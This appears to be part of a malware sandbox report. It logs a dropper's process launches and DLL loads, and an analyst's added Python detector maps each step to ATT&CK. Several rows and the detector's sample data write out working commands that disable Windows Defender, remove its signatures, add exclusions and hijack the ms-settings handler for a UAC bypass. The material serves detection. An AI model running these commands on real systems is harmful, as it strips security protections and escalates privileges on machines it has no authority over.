                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "start bound.exe"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe "C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "c:\program files (x86)\internet explorer\iexplore.exe"
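The process-creation rows above contain the whole second-stage chain in plain text: the ms-settings shell handler is hijacked under HKCU (with an empty DelegateExecute value), the auto-elevating ComputerDefaults.exe is launched and spawns DE5A.exe from the user's Temp directory, Defender is then disabled, excluded and stripped of its definitions, the Defender operational log is read back, AV process names are grepped out of tasklist, and the machine UUID is pulled via WMI. The following detector is an added example and not part of the Joe Sandbox report: it parses rows in the "Source: ... Process created: ..." form (fused or pipe-separated), applies one rule per observed technique, and only reports the UAC bypass as complete when both the handler hijack and the elevated launch are present. The sample rows are copied from this report; the rule names and the ATT&CK mappings are my own, and on a live host the same logic would run over Sysmon Event ID 1 or Security 4688 records with command-line logging enabled.

```python
import re
from collections import Counter

# Constructed sample: rows copied from the sandbox report above. Most use the
# "Source: <parent> | Process created: <child image> <command line>" layout;
# two are left in the fused form the raw extraction produces.
SAMPLE_ROWS = r"""
Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f"
Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults --nouacbypass
Source: C:\Windows\System32\ComputerDefaults.exe | Process created: C:\Users\user\AppData\Local\Temp\DE5A.exe "C:\Users\user\AppData\Local\Temp\DE5A.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wevtutil.exe wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
"""

# The child image is taken up to the first .exe/.pif so paths with spaces
# ("C:\Program Files\Windows Defender\MpCmdRun.exe") are kept whole.
ROW_RE = re.compile(
    r"^Source:\s*(?P<parent>.+?)\s*\|?\s*Process created:\s*"
    r"(?P<child>.+?\.(?:exe|pif))\s*(?P<cmdline>.*)$",
    re.IGNORECASE,
)

# Process names the dropper's findstr filters look for (from the report).
AV_PROCESS_NAMES = ("wrsa.exe", "opssvc.exe", "avastui.exe", "avgui.exe",
                    "nswscsvc.exe", "sophoshealth.exe")
# Auto-elevating binaries that honour the ms-settings handler.
AUTO_ELEVATE = ("\\fodhelper.exe", "\\computerdefaults.exe")

# (rule name, ATT&CK technique or None, predicate over lower-cased parent/child/cmdline)
RULES = [
    ("ms-settings shell handler hijack", "T1548.002",
     lambda p, c, cl: "reg add" in cl and "\\ms-settings\\shell\\open\\command" in cl),
    ("auto-elevating binary spawned payload from user temp", "T1548.002",
     lambda p, c, cl: p.endswith(AUTO_ELEVATE) and "\\appdata\\local\\temp\\" in c),
    ("Defender real-time protection disabled", "T1562.001",
     lambda p, c, cl: "set-mppreference" in cl and "-disablerealtimemonitoring" in cl),
    ("Defender path exclusion added", "T1562.001",
     lambda p, c, cl: "add-mppreference" in cl and "-exclusionpath" in cl),
    ("Defender signature database removed", "T1562.001",
     lambda p, c, cl: c.endswith("\\mpcmdrun.exe") and "-removedefinitions" in cl),
    ("Defender operational log read", None,
     lambda p, c, cl: c.endswith("\\wevtutil.exe") and "windows defender/operational" in cl),
    ("security software discovery via findstr", "T1518.001",
     lambda p, c, cl: c.endswith("\\findstr.exe") and any(n in cl for n in AV_PROCESS_NAMES)),
    ("hardware UUID query (sandbox/VM fingerprinting)", "T1082",
     lambda p, c, cl: "csproduct" in cl and "uuid" in cl),
]


def parse_rows(text):
    """Yield (parent, child, cmdline) for each parsable row; skip anything else."""
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            yield m.group("parent"), m.group("child"), m.group("cmdline")


def analyze(text):
    """Run every rule over every row and return one finding per (row, rule) hit."""
    findings = []
    for parent, child, cmdline in parse_rows(text):
        p, c, cl = parent.lower(), child.lower(), cmdline.lower()
        for name, technique, hit in RULES:
            if hit(p, c, cl):
                findings.append({"rule": name, "technique": technique,
                                 "parent": parent, "child": child})
    return findings


def summarize(findings):
    """Count hits per rule."""
    return Counter(f["rule"] for f in findings)


def uac_bypass_chain_complete(findings):
    """True only if the handler was hijacked AND an auto-elevated binary launched the payload;
    a lone HKCU reg add is something any user can do and is not a bypass by itself."""
    seen = {f["rule"] for f in findings}
    return {"ms-settings shell handler hijack",
            "auto-elevating binary spawned payload from user temp"} <= seen


if __name__ == "__main__":
    found = analyze(SAMPLE_ROWS)
    for f in found:
        print(f"[{f['technique'] or 'n/a'}] {f['rule']}: {f['parent']} -> {f['child']}")
    print("UAC bypass chain complete:", uac_bypass_chain_complete(found))
```

The two-stage check in uac_bypass_chain_complete is the part worth keeping: the registry write alone fires on benign tooling and on attempts that never elevate, while ComputerDefaults.exe or fodhelper.exe spawning an image from a user-writable path is the moment the bypass actually succeeded. Note that the report shows the key being deleted again afterwards (reg delete hkcu\Software\Classes\ms-settings), so a host-side check of that key after the fact will come back clean; the process telemetry is the durable evidence.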
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe | Section loaded: webio.dll
Source: C:\Windows\explorer.exe | Section loaded: networkexplorer.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: dui70.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: duser.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: thumbcache.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: dataexchange.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: windows.ui.fileexplorer.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: assignedaccessruntime.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: structuredquery.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: windows.storage.search.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: twinapi.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: actxprxy.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: networkexplorer.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\wsruwii | Section loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: vcruntime140.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: python3.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: libffi-8.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: sqlite3.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: libcrypto-3.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: libssl-3.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wevtutil.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wevtutil.exeSection loaded: wevtapi.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: ieframe.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: netapi32.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: version.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: wkscli.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: edputil.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: mlang.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: mrmcorer.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: windows.staterepositorycore.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: windows.ui.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: windowmanagementapi.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: textinputframework.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: inputhost.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: twinapi.appcore.dll
